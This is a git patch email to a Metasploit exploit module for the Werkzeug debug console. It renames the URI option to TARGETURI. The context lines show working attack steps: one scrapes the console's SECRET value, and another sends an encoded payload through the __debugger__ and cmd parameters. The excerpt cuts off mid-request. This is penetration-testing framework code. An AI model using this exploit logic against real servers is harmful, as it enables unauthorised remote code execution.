From 57f62ffa76d6feeb7b23b0e4ef639f7e709d770c Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 13 Jul 2015 20:18:45 -0400 Subject: [PATCH] changed URI to TARGETURI as per comments --- modules/exploits/multi/http/werkzeug_debug_rce.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/werkzeug_debug_rce.rb b/modules/exploits/multi/http/werkzeug_debug_rce.rb index 3ed9af96a4..0c5a6d662c 100644 --- a/modules/exploits/multi/http/werkzeug_debug_rce.rb +++ b/modules/exploits/multi/http/werkzeug_debug_rce.rb @@ -36,7 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote ) register_options( [ - OptString.new('URI',[true,'URI to the console','/console']) + OptString.new('TARGETURI',[true,'URI to the console','/console']) ], self.class ) end @@ -44,7 +44,7 @@ class Metasploit4 < Msf::Exploit::Remote def check res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['URI']) + 'uri' => normalize_uri(datastore['TARGETURI']) }) #https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67 if res and res.body =~ /Werkzeug powered traceback interpreter/ @@ -57,14 +57,14 @@ class Metasploit4 < Msf::Exploit::Remote #first we need to get the SECRET code res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['URI']) + 'uri' => normalize_uri(datastore['TARGETURI']) }) if res and res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/ secret = res.body.match(/SECRET = "([a-zA-Z0-9]{20})";/).captures[0] vprint_status("Secret Code: #{secret}") res = send_request_cgi({ 'method' => 'GET', - 'uri' => normalize_uri(datastore['URI']), + 'uri' => normalize_uri(datastore['TARGETURI']), 'vars_get' => { '__debugger__' => 'yes', 'cmd' => payload.encoded,